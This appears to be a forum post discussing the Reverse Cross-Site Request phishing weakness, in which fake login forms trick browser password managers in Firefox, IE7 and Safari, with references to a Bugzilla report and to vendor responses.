This is sensational journalism at it finest.
Firefox is not the only browser vulnerable to this type of exploit. IE7 and Safari are also vulnerable. This is probably the first, in my memory, exploit to affect multiple browsers on multiple platforms.
The exploit in question is a Reverse Cross-Site Request (RCSR), brought to light by last months phishing scam on MySpace.
This vulnerability could affect anyone, using FireFox, IE7, and Safari, visiting a website that allows user-contributed HTML code.
The browser is not directly fooled, by the RCSR exploit. Instead the user is presented with a fake login page that fool’s the browser into providing the UserID and Log-In information. None of these browsers were designed to check the form data before submission.
This type of attack is particularly effective, as the user is presented with a Log-In page very similar to the one they are used to seeing on a website they trust.
Firefox developer discussion at
Bugzilla Bug 360493 Cross-Site Forms + Password Manager = Security Failure
Microsoft has acknowledged the vulnerability, but inquires by Chapin Information Services (CIS) have been met with this response from Microsoft.
“We are aware of the issue you reported.” And, “As a matter of policy, we cannot comment on ongoing investigations.”
I have located no official documentation from Apple regarding this vulnerability in Safari.
Unsolved 
Offline 
